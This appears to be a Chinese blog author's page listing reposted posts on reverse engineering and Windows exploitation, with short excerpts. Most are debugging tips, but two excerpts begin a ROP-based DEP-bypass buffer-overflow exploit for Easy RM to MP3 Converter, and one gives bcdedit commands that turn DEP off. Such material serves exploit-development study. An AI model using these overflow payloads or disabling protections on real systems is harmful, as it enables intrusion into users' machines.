加密解密
sam20151111sam
这个作者很懒,什么都没留下…
展开
-
python 调用加密函数dll
test.py:import ctypeslib = ctypes.CDLL('TCPSocket.dll')def opaque_ptr(name): cls = type(name, (ctypes.Structure,),{}) return ctypes.POINTER(cls)class CTCPSocket(object): _CTCPSo转载 2015-01-12 10:44:51 · 939 阅读 · 0 评论 -
mona常用命令
!mona rop -m msvcr71.dll -n -cpb '\x0a\x0d'转载 2015-04-30 11:29:00 · 2221 阅读 · 0 评论 -
查找pop pop ret call dword ptr [esp+nn]指令的方法
Immdbg的pvefindaddr插件可以找到这种指令转载 2015-04-28 18:56:49 · 766 阅读 · 0 评论 -
汇编直接转换为C语言 Hex Rays Decompiler
汇编直接转换为C语言 Hex Rays Decompiler转载 2015-10-20 10:56:38 · 17786 阅读 · 1 评论 -
适合中文版本的Easy RM to MP3 Converter rop 过depexploit
#------------------------------------------------------------#ROP based exploit for Easy RM to MP3 Converter#written by corelanc0d3r - http://www.corelan.be#-------------------------------------转载 2015-05-01 16:46:45 · 912 阅读 · 0 评论 -
Easy RM to Mp3 Converter测试rop的代码
my $file="rop.m3u";my $buffersize=26094-20-8-4;my $junk="A"x$buffersize;my $eip=pack('V',0x100102DC);#pointer to retmy $junk2="AAAA";#compensate,to make sure esp points at first rop gadgetmy转载 2015-05-01 10:14:43 · 432 阅读 · 0 评论 -
如何查看程序是否支持ASLR
使用工具PE EXPLOER打开,查看DllCharacteristics是否包含0x40就可以知道是否支持ASLR转载 2015-04-28 21:59:18 · 1282 阅读 · 1 评论 -
命令行下修改DEP
bcdedit.exe /set nx OptInbcdedit.exe /set nx OptOutbcdedit.exe /set nx AlwaysOnbcdedit.exe /set nx AlwaysOff转载 2015-04-28 22:47:46 · 785 阅读 · 0 评论 -
enter,leave汇编的作用,这个对理解UAC有用
enter语句的作用是:push ebpmov ebp,espsub esp,xxxleave语句的作用是add esp,xxxpop ebp转载 2015-04-26 09:50:13 · 509 阅读 · 0 评论 -
调试技巧
1.ollydbg可以直接在windows的api函数上下断点,但必须大小写正确如Ctrl+G 然后输入GetDlgItemTextA就可以到了这个函数的起始位置!转载 2015-04-24 10:51:55 · 289 阅读 · 0 评论 -
查找api函数地址
LibHandle=LoadLibrary("msadco.dll"); printf("kernel32 LibHandle=//x%x\n",LibHandle); ProcAdd=(MYPROC)GetProcAddress(LibHandle,"CreateObject"); printf("WinExec=//x%x\n",ProcAdd);转载 2015-04-16 21:07:04 · 448 阅读 · 0 评论 -
快速查找mfc按键对应的程序代码
_AfxDispatchCmdMsg(this, nID, nCode,lpEntry->pfn, pExtra,lpEntry->nSig, pHandlerInfo);在_AfxDispatchCmdMsg下断点,在[esp+8]的位置就是ID(通过ollydbg的windows可以查看到的),[esp+16]位置就是处理函数代码的位置!(3)为了定位到_AfxDispat转载 2015-04-16 20:53:08 · 2541 阅读 · 0 评论 -
调用游戏dll里面的汇编函数
// myLoadLibrary.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include #include using namespace std;int _tmain(int argc, _TCHAR* argv[]){ typedef WORD (*pEncryptBuffer)(WORD wMainCm转载 2015-01-22 13:25:19 · 1133 阅读 · 0 评论 -
web.config加密解密方法
1.用.net Reflector查看代码2.在任意执行sql的地方,找到连接到数据库的语句,如DBData.GetDataDBCommand();3.进入DBData.GetDataDBCommand();,会出现DBCommand(xx.DataDBType, xx.DataDBConnString);4.xx.DataDBConnString就是解密后的内容转载 2016-05-15 01:22:44 · 540 阅读 · 1 评论